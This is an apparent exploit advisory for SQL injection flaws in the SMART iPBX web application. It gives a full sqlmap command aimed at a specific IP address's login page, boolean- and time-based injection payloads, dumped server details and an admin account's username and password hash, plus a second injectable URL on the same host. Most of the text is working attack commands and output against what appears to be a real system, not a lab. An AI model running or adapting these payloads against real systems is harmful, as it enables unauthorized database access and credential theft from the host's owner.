SMART iPBX - Multiple Sql Injection
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://softmatica.com.do/softmatica/?p=216
####################################################################
Multiple Sql Injection
=======================
[1] Time-Based Blind Injection [POST]
sqlmap.py -u "http://190.6.141.106/login_validator.php"
--data="user=AXT&pass=AXT&login=Entrar" -p "user" --level=5 --risk=5 -D
asterisk -T user -C id,level,username,password --dump
Place: POST
Parameter: user
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: user=-AXT' OR (4281=4281)#&pass=AXT&login=Entrar
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
Payload: user=AXT' AND
5746=BENCHMARK(5000000,MD5(0x6f464d48))#&pass=AXT&login=Entrar
---
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: asterisk
Table: user
[1 entry]
+----+---------+----------+------------------------------------------+
| id | level | username | password |
+----+---------+----------+------------------------------------------+
| 1 | 9 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+---------+----------+------------------------------------------+
[2] Classic Sql injection
http://190.6.141.106/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1